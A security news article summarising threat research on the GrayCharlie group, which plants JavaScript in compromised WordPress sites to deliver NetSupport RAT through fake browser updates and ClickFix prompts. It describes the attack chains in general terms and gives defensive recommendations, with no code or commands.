Since its formation in the middle of 2023, the GrayCharlie group has been a cybercriminal organization that actively compromises WordPress websites in order to propagate the NetSupport RAT (Remote Access Trojan) and steal confidential information. The threat actor uses sophisticated techniques to trick users into downloading malicious payloads, frequently using ClickFix pop-ups or phony browser update prompts. The ultimate objective of these attacks is information theft and financial gain through the use of malware like Stealer and SectopRAT.

The Infrastructure and Infection Chain of GrayCharlie GrayCharlie inserts JavaScript links into WordPress websites that have been compromised. When a user visits these websites, they are taken to ClickFix pop-ups or phony browser update pages, both of which entice users to download malicious software.

By installing NetSupport RAT, this software grants attackers complete access to the victim's system, enabling them to track activities, obtain login credentials, and even take over the compromised computer. The Insikt Group has monitored GrayCharlie's activities and discovered a variety of infrastructure associated with the company, the majority of which is hosted by HZ Hosting Ltd. and MivoCloud. Along with other compromised infrastructure, these websites act as NetSupport RAT's command-and-control (C2) servers.

Additionally, the group has run staging infrastructure on these systems to send malicious payloads to compromised websites. The campaign's MFA (Multi-Factor Authentication) circumvention is among its most alarming features. GrayCharlie circumvents MFA protections by tricking users into entering their credentials into legitimate login forms because it uses live web pages.

An overview of GrayCharlie clusters seen in 2025 (Source: Recorded Future) By obtaining the authentication tokens and session cookies, the attackers successfully eliminate the additional security measure. Analysis of Attack Chains GrayCharlie has been seen deploying NetSupport through two main attack chains. Fake Browser Update Chain (RAT): This technique tricks users into thinking they need to update their browser by using hacked websites to show a phony update prompt.

The payload is delivered and silently executed after the user downloads the "update." ClickFix Chain: In this version, users are prompted to run a malicious command from the Windows Run dialog by a ClickFix pop-up. Social engineering is used in this technique to fool victims into executing malicious scripts.

"Wiser University" impersonation website (Source: Recorded Future) By configuring registry keys after installation, the malware creates persistence and makes sure the RAT launches at each system startup. After connecting to the C2 servers, the attackers can remotely take control of the system, keep an eye on activity, and steal data. Organizations must block known IP addresses and domains linked to the NetSupport RAT and related malware in order to protect themselves from GrayCharlie's attacks.

Website impersonating "Activitar" (Source: Recorded Future) To detect and stop infections, security teams should use updated detection rules like YARA, Snort, and Sigma. Because hackers regularly send stolen data back to their C2 servers, it's also critical to keep an eye out for indications of data exfiltration.

Important tactics to stop these attacks also include email filtering and increased awareness of dubious links. Users should be made aware of the risks posed by phony updates and dubious pop-ups by organizations. With its continuous operations and ever-more-advanced strategies, GrayCharlie continues to pose a serious threat to businesses around the globe, said Recorded Future, particularly in sectors like legal services that have recently been the focus of attacks.